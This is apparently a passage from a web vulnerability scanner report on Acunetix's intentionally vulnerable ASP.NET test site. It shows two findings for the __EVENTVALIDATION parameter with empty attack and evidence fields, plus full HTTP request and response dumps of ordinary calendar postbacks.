</TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8324&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAa14Jr9oIZGRkAKq1EXfjqe9y%2BK2WNP%2FgM6Ei6mw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLv1YDjCwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLNq0cJmvZB%2F%2FiMsxYr6hC70xiGWw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:59 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAa14Jr9oIZGRkAKq1EXfjqe9y+K2WNP/gM6Ei6mw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLv1YDjCwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLNq0cJmvZB//iMsxYr6hC70xiGWw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:White" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8612&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAYxVZkdsIZGRkzPT2oLH9Yf7YwT2PxfjPs8jPaJI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLVkJXzCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogaFaC%2FjZAcpY%2BUUzhN%2FkQGPxAd92A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:40 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBAYxVZkdsIZGRkzPT2oLH9Yf7YwT2PxfjPs8jPaJI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLVkJXzCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogaFaC/jZAcpY+UUzhN/kQGPxAd92A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:White" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 